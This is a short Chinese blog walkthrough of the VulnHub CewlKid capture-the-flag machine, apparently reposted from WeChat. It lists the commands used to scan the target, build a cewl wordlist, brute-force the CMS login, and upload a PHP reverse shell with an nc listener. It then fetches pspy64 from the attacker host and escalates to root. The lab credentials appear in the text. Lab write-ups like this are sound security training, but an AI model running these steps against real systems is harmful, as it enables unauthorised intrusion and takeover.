今天实践的是vulnhub的CewlKid镜像,
下载地址,https://download.vulnhub.com/cewlkid/CewlKid.zip,
先是用workstation导入,做地址扫描没扫到地址,
于是又用virtualbox导入,重新做地址扫描,
sudo netdiscover -r 192.168.1.0/24,这回有地址了,106就是,
再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.1.106,
有web服务,浏览器访问http://192.168.1.106:8080,是CMS,
爬页面里的信息,cewl -d 3 -m 5 http://192.168.1.106:8080,
用burp suite做暴破,
得到有效的账号密码,admin/Letraset,登录进CMS,
这个有意思了,制作靶机的人这是忘了把反弹shell脚本删了啊,但是咱不知道反弹的地址和端口,还是得自己重新上传自己的反弹shell脚本,
直接用kali攻击机上自带的就行,
cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php,
改好反弹的地址和端口,上传上去,
kali攻击机上开个反弹shell监听,nc -lvp 4444,
浏览器访问http://192.168.1.106:8080/files/images/shell.php,
这就拿到反弹shell了,不是root,需要提权,
kali攻击机上下载pspy64,
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64,
再开个http下载,python2 -m SimpleHTTPServer,
靶机的shell转成交互式的,
python3 -c 'import pty;pty.spawn("/bin/bash")',
进入可写的目录,cd /tmp,
下载pspy64,wget http://192.168.1.107:8000/pspy64,
修改权限,chmod 777 pspy64,
执行,./pspy64
获取到账号密码cewlbeans/fondateurs,
切换账户,su cewlbeans,再sudo -l,
获取到root的shell,sudo -u root /bin/sh,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之CewlKid的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论